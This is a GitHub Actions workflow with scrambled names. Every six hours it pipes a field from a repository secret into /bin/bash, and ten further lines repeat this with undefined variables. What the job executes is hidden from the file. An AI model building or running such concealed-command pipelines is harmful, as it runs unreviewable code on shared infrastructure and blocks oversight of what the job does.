name: fudouding1938

on:
  workflow_dispatch:
  schedule:
    - cron: '9 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fudouding1938
        env:
          szv6164: ${{ secrets.szv6164 }}
        run: |
          echo $szv6164 | jq -r .zz859 | /bin/bash
          echo $dskg67741 | jq -r .mvr423 | /bin/bash
          echo $ggni13556 | jq -r .t74166 | /bin/bash
          echo $azih85 | jq -r .g97443 | /bin/bash
          echo $zb02456 | jq -r .qdrm96010 | /bin/bash
          echo $x9 | jq -r .xcpjo1 | /bin/bash
          echo $lins624 | jq -r .znk66 | /bin/bash
          echo $ue65086 | jq -r .olq1540 | /bin/bash
          echo $bv510 | jq -r .g842 | /bin/bash
          echo $yqvm8966 | jq -r .w782 | /bin/bash
          echo $edf72925 | jq -r .owa04131 | /bin/bash

